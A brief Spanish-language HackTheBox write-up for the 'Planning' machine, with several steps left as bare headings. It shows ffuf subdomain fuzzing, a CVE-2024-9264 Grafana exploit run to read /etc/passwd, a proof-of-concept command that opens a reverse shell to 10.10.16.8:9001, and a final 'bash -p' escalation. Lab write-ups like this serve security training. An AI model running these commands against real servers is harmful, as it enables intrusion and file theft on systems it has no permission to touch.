Planning

Un escaneo rapido:

Nada interesante.
Miramos la Web:

Listamos los subdominios:
ffuf -w /opt/SecLists/Discovery/DNS/subdomains-spanish.txt -H "Host: FUZZ.planning.htb" -u http://planning.htb/ -fs 178


Tenemos las credenciales:
Machine Information
As is common in real life pentests, you will start the Planning box with credentials for the following account: admin
/ 0D5oT70Fq13EvB5r

Exploir encontrado:
Lo ejecutamos:
python3 CVE-2024-9264.py -u admin -p 0D5oT70Fq13EvB5r -f /etc/passwd http://grafana.planning.htb/

Ahora intentamos tirarnos una WebShell:
python3 poc.py --url http://grafana.planning.htb/ --username admin --password 0D5oT70Fq13EvB5r --reverse-ip 10.10.16.8 --reverse-port 9001

Ahora busacaremos algo interesante coomo un .db:
El comando env
muestra todas las variables de entorno que están configuradas para el usuario root en la máquina comprometida. Estas variables son utilizadas por los procesos del sistema operativo y las aplicaciones para configurar su comportamiento.

Ahora nos conectamos por ssh:

Escalada de privilegios:
Encontramos otra .db:

Abrimos el tunel que esta abierto por el puerto 8000 e ingresamos las credenciales:

Seguimos:

bash -p

Last updated